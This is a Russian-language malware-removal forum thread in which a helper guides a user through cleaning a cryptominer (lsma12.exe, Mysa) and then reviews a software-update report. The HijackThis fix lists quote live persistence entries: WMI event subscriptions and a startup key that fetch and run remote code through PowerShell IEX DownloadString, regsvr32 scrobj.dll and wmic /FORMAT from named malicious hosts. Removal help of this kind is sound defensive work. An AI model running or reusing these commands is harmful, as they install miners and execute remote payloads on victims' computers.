Вирус майнер lsma 12, Mysa

[Eugene96]

Здравствуйте. Компьютер стал сильно тормозить. Нашел через AnVir Task Manager Free процесс lsma 12.exe. Удалил экзешник, но после перезагрузки файл загрузился заново. Несколько дней пытался чистить реестр самостоятельно через Hjackthis и вручную, чистил автозагрузки, удалял непосредственно файлы Mysa и lsma 12. Но вирус по прежнему возвращается, даже после скана GridinSoft Anti-Malware, который выдает что троянов уже нет. Некоторые строчки реестра возвращаются после перезагрузки. Помогите, пожалуйста. Прикрепляют логи.

[Info_bot]

Уважаемый(ая) Eugene96, спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

[Sandor]

Здравствуйте!

Через Панель управления (Параметры) - Удаление программ (Приложения и возможности) - удалите нежелательное ПО:

Unchecky v1.2

"Пофиксите" в HijackThis:

Код:

O25 - WMI Event: coronav2 - coronav - Event="__InstanceModificationEvent WITHIN 10900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://ruisgood.ru/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://gamesoxalic.com/power.txt')||regsvr32 /u /s /i:http://ruisgood.ru/s.txt scrobj.dll&regsvr32 /u /s /i:http://gamesoxalic.com/s.txt scrobj.dll&wmic os get /FORMAT:"http://ruisgood.ru/s.xsl"
O25 - WMI Event: fuckamm4 - fuckamm3 - Event="__InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c start c:\windows\inf\aspnet\lsma12.exe -p

Перезагрузите компьютер.

Вы собрали логи устаревшей версией. Удалите Autologger и созданную им папку вместе с содержимым. Скачайте актуальную версию (по первой ссылке из правил) и повторите CollectionLog.

[Eugene96]

Проблема актуальна.

ПО удалил. Строки пофиксил. Перезагрузил и сразу сделал логи новой версией.

[Sandor]

Пролечите систему с помощью KVRT. Папку C:\KVRT_Data\Reports упакуйте в архив и прикрепите к следующему сообщению.
После этого соберите свежий CollectionLog (переименовывать архив не нужно).

[Eugene96]

Пролечил, нашло 3 вируса. После перезагрузки запустилась NTFS проверка жесткого диска. При включении не появилось ни lsma 12.exe, ни Mysa. KVRT запустился повторно и нашел 58 угроз. Пролечил. Прикрепляю отчет KVRT и новые логи.

[Sandor]

"Пофиксите" в HijackThis:

Код:

O4 - MSConfig\startupreg: TNOD UP [command] = C:\TNOD\TNODUP.exe /i (HKLM) (2017/06/09) (file missing)
O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mys2016.info:280/v1.sct scrobj.dll (HKLM) (2020/10/21)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)

Проблема решена?

[Eugene96]

Да! Спасибо огромное. Как можно вас отблагодарить ?

[Sandor]

В завершение:

• Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
• Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10)
• Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
• Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
• Прикрепите этот файл к своему следующему сообщению.

[Eugene96]

Готово.

[Sandor]

------------------------------- [ Windows ] -------------------------------
Расширенная поддержка закончилась 14.01.2020, Ваша операционная система может быть уязвима к новым типам угроз
Internet Explorer 11.0.9600.18524 Внимание! Скачать обновления
^Используйте Средство устранения неполадок при проблемах установки^
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
------------------------------- [ HotFix ] --------------------------------
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4474419 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4539602 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Notepad++ (64-bit x64) v.7.8.4 Внимание! Скачать обновления
Windows Movie Maker v.6.0.6002.18005 Данная программа больше не поддерживается разработчиком.
paint.net v.4.0.16 Внимание! Скачать обновления
Microsoft .NET Framework 4.7.1 v.4.7.02558 Внимание! Скачать обновления
NVIDIA GeForce Experience 3.20.4.14 v.3.20.4.14 Внимание! Скачать обновления
K-Lite Mega Codec Pack 13.1.0 v.13.1.0 Внимание! Скачать обновления
-------------------------------- [ Arch ] ---------------------------------
7-Zip 16.04 (x64) v.16.04 Внимание! Скачать обновления
^Удалите старую версию, скачайте и установите новую.^
WinRAR 5.40 (64-разрядная) v.5.40.0 Внимание! Скачать обновления
--------------------------------- [ P2P ] ---------------------------------
µTorrent v.3.5.0.43580 Внимание! Клиент сети P2P с рекламным модулем!.
µTorrent, версия 3.5.0.43580 v.3.5.0.43580 Внимание! Клиент сети P2P с рекламным модулем!.
-------------------------------- [ Java ] ---------------------------------
Java 8 Update 121 (64-bit) v.8.0.1210.13 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u271-windows-x64.exe)^
Java 8 Update 121 v.8.0.1210.13 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u271-windows-i586.exe)^
--------------------------- [ AppleProduction ] ---------------------------
QuickTime 7 v.7.79.80.95 Данная программа больше не поддерживается разработчиком и имеет известные проблемы безопасности! Рекомендуется деинсталлировать данное ПО.
--------------------------- [ AdobeProduction ] ---------------------------
Adobe Shockwave Player + Authorware Web Player v.v12.2.8.198 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее.
------------------------------- [ Browser ] -------------------------------
Mozilla Firefox 52.0.2 (x64 ru) v.52.0.2 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О Firefox!^
Opera Stable 71.0.3770.284 v.71.0.3770.284 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^
---------------------------- [ UnwantedApps ] -----------------------------
Security Task Manager 2.4 v.2.4 Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии.
The KMPlayer RePack by CUTA v.4.1.5.8 - (build 5) Внимание! Нелицензионное ПО, репак, утилита активации, кряк или кейген.
Asmwsoft PC Optimizer version 9.0 v.9.0 Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии.